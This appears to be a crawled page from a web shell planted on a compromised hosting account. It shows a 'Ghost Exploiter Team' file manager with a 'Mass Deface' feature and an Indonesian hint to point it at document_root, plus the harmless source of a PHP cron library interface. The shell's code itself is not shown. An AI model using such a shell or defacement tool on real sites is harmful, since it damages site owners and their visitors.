webshell
Ghost Exploiter Team Official
Mass Deface
Directory >>
/
home
/
whitjouh
/
public_html
/
core
/
vendor
/
dragonmantank
/
cron-expression
/
src
/
Cron
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
+New File
AbstractField.php
9.659KB
edt
ren
CronExpression.php
20.152KB
edt
ren
DayOfMonthField.php
4.771KB
edt
ren
DayOfWeekField.php
5.624KB
edt
ren
FieldFactory.php
1.372KB
edt
ren
FieldFactoryInterface.php
0.118KB
edt
ren
FieldInterface.php
1.295KB
edt
ren
HoursField.php
6.936KB
edt
ren
MinutesField.php
2.64KB
edt
ren
MonthField.php
1.305KB
edt
ren
<?php declare(strict_types=1); namespace Cron; use DateTimeInterface; /** * CRON field interface. */ interface FieldInterface { /** * Check if the respective value of a DateTime field satisfies a CRON exp. * * @internal * @param DateTimeInterface $date DateTime object to check * @param string $value CRON expression to test against * * @return bool Returns TRUE if satisfied, FALSE otherwise */ public function isSatisfiedBy(DateTimeInterface $date, $value, bool $invert): bool; /** * When a CRON expression is not satisfied, this method is used to increment * or decrement a DateTime object by the unit of the cron field. * * @internal * @param DateTimeInterface $date DateTime object to change * @param bool $invert (optional) Set to TRUE to decrement * @param string|null $parts (optional) Set parts to use * * @return FieldInterface */ public function increment(DateTimeInterface &$date, $invert = false, $parts = null): FieldInterface; /** * Validates a CRON expression for a given field. * * @param string $value CRON expression value to validate * * @return bool Returns TRUE if valid, FALSE otherwise */ public function validate(string $value): bool; }